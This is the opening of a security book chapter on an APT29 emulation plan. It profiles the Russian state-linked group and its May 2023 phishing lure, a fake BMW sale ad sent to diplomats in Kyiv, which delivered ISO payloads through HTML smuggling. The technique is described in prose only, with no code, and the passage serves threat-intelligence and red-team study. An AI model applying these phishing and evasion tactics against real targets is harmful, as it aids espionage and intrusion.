Chapter 16. APT29 Emulation Plan

This chapter will delve into enumeration of APT29, a Russian state-sponsored hacking group with many associated groups, including NOBELIUM, Cloaked Ursa, Cozy Bear, and CozyDuke. Linked to the Russian government’s Foreign Intelligence Service (SVR), the group has been active in several recent cyberespionage campaigns. Some of its common targets are government, diplomatic, think-tank, healthcare, and energy sectors. The group is known for its unconventional tactics. APT29 has evolved its phishing techniques, using personalized tricks tailored to email recipients.

For instance, in a recent operation that began in May 2023, APT29 used a BMW car advertisement to target diplomats in Kyiv, Ukraine (see Figure 16-1).¹ This advertisement mimicked a legitimate car sale previously circulated by a Polish diplomat, which added to its credibility. When recipients clicked on a link in the malicious document, supposedly to view “more high-quality photos,” they were redirected to an HTML page that delivered malicious ISO file payloads through a technique known as HTML smuggling. This method uses HTML5 and JavaScript to hide malicious payloads in encoded strings within an HTML attachment or web page; these strings are then decoded by a browser upon opening. This technique helps to evade security software because the malicious code is obfuscated and only decoded when rendered in the browser.